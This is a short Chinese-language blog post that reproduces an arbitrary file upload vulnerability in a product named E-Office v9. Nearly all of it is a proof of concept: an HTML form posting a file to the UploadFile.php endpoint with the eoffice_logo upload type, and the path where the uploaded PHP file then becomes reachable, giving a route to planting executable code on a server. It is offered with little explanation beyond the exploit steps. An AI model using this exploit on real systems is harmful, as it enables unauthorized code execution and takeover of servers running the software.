某 E-Office v9 任意文件上传漏洞复现

作者: print("") 分类: 信息安全 发布时间: 2021-11-28 13:44

POC

<form id="upload-form" action="http://xxxx.com/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo" method="post" enctype="multipart/form-data" >
   <input type="file" id="Filedata" name="Filedata" /> <br />
   <input type="submit" value="Upload" />
</form>

上传成功会返回

logo-eoffice.php

访问URL;/images/logo/logo-eoffice.php

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注